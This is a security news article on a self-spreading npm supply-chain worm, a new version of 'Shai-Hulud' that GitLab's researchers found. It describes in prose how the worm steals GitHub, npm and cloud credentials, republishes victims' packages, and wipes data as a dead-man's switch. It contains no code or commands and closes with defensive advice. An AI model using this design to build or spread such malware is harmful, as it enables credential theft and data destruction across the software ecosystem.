GitLab’s Vulnerability Research team has uncovered a large-scale supply chain attack spreading a destructive malware variant through the npm ecosystem.
The malware, an evolved version of “Shai-Hulud,” contains a dangerous feature that threatens to destroy user data if attackers lose control of their infrastructure. The malware spreads through infected npm packages using a multi-stage process.
When developers install a compromised package, a script automatically downloads what appears to be a legitimate version of the Bun JavaScript runtime.
Affected npm Packages
However, this is a disguise for the malware’s actual payload. This heavily obfuscated 10MB file executes on the victim’s system.
Once running, the malware aggressively harvests credentials from multiple sources, including GitHub tokens, npm authentication keys, and accounts for AWS, Google Cloud, and Microsoft Azure.
It even downloads Trufflehog, a legitimate security tool, to scan the entire home directory for hidden API keys and passwords stored in configuration files.
Using stolen npm tokens, the malware automatically infects all other packages maintained by the victim.
It modifies the package.json files to include malicious scripts, increments version numbers, and republishes everything to npm.
This worm-like behavior means the attack spreads exponentially across the ecosystem. The stolen credentials are exfiltrated to attacker-controlled GitHub repositories marked with “Sha1-Hulud: The Second Coming.”
These repositories create a resilient botnet-like network in which compromised systems share access tokens.
Most critically, the malware includes a destructive payload designed to protect the attack’s infrastructure. If an infected system simultaneously loses access to both GitHub and npm, it triggers immediate data destruction.
On Windows systems, the malware attempts to delete all user files and overwrite disk sectors. On Linux and Mac systems, it uses advanced wiping techniques to make file recovery impossible.
This creates a dangerous scenario: if GitHub removes malicious repositories or npm revokes compromised tokens, thousands of infected systems could simultaneously destroy user data across the internet.
GitLab recommends enabling Dependency Scanning in your projects to detect compromised packages before they reach production automatically.
Security teams should also monitor for suspicious npm preinstall scripts and unusual version increments in their dependencies.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
